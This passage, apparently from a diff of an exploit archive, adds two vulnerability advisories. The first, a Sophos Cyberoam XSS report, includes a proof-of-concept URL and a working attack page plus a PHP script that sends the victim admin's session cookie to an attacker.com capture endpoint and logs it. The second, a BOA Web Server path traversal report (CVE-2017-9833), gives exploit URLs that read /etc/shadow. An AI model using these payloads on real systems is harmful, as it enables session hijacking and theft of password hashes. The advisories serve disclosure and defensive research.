|
||||
|
||||
The specific flaw exists within the handling of request to
|
||||
“LiveConnectionDetail.jsp” application. GET parameters “applicationname”
|
||||
and “username” are improperly sanitized allowing an attacker to inject
|
||||
arbitrary javascript into the page. This can be abused by an attacker to
|
||||
perform a cross-site scripting attack on the user.
|
||||
|
||||
|
||||
Vulnerable module/page/application:
|
||||
/corporate/webpages/trafficdiscovery/LiveConnectionDetail.jsp
|
||||
|
||||
|
||||
Vulnerable parameters: applicationname and username
|
||||
|
||||
|
||||
=======
|
||||
|
||||
*PoC*
|
||||
|
||||
|
||||
http://192.168.30.30/corporate/webpages/trafficdiscovery/LiveConnectionDetail.jsp?ipFamily=0&applicationname=OTHER%20APPLICATIONS46449
|
||||
";alert(document.cookie)//181&username=NA
|
||||
|
||||
|
||||
*PoC Video*
|
||||
|
||||
|
||||
https://www.youtube.com/watch?v=NmLPL2TYPcg
|
||||
|
||||
|
||||
*Real world scenario*
|
||||
|
||||
|
||||
1) Victim (Admin) login to the Sophos Cyberoam web console
|
||||
|
||||
2) Sophos Cyberoam FW is on a latest version
|
||||
|
||||
3) record.txt is empty on attacker page
|
||||
|
||||
4) Victim (Admin) visits attacker URL/page
|
||||
|
||||
|
||||
http://www.attacker.com/promo.html
|
||||
|
||||
|
||||
5) XSS successful and attacker captured cookie in record.txt
|
||||
|
||||
|
||||
|
||||
|
||||
-------------------------- Source code (promo.html)
|
||||
----------------------------------
|
||||
|
||||
<html>
|
||||
|
||||
<head>
|
||||
|
||||
<script>
|
||||
|
||||
window.location="
|
||||
http://192.168.30.30/corporate/webpages/trafficdiscovery/LiveConnectionDetail.jsp?ipFamily=0&applicationname=OTHER%20APPLICATIONS46449\
|
||||
";document.location='
|
||||
http://www.attacker.com/capture.php?content='.concat(escape(document.cookie));//181&username=NA
|
||||
"
|
||||
|
||||
</script>
|
||||
|
||||
</body>
|
||||
|
||||
</html>
|
||||
|
||||
-------------------------- Source code (capture.php)
|
||||
----------------------------------
|
||||
|
||||
|
||||
<?php
|
||||
|
||||
file_put_contents('record.txt', $_GET['content']);
|
||||
|
||||
echo "<HTML><body><script>window.location=\"
|
||||
http://192.168.30.30/corporate/webpages/index.jsp\"</script></body></HTML>"
|
||||
|
||||
?>
|
||||
|
||||
|
||||
|
||||
|
||||
Credits:
|
||||
=======
|
||||
|
||||
Bhadresh Patel
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------------------------------------------------
|
26
platforms/linux/webapps/42290.txt
Executable file
26
platforms/linux/webapps/42290.txt
Executable file
|
@ -0,0 +1,26 @@
|
|||
BOA Web Server 0.94.14 - Access to arbitrary files as privileges
|
||||
|
||||
Title: Vulnerability in BOA Webserver 0.94.14
|
||||
Date: 20-06-2017
|
||||
Status: Vendor contacted, patch available
|
||||
Scope: Arbitrary file access
|
||||
Platforms: Unix
|
||||
Author: Miguel Mendez Z
|
||||
Vendor Homepage: http://www.boa.org
|
||||
Version: Boa Webserver 0.94.14rc21
|
||||
CVE: CVE-2017-9833
|
||||
|
||||
|
||||
Vulnerability description
|
||||
-------------------------
|
||||
-We can read any file located on the server
|
||||
The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges. Without using access credentials
|
||||
|
||||
Vulnerable variable:
|
||||
FILECAMERA=../../etc/shadow%00
|
||||
|
||||
Exploit link:
|
||||
/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/shadow%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0
|
||||
|
||||
Poc:
|
||||
http://127.0.0.1/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/shadow%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0
|
Loading…
Add table
Reference in a new issue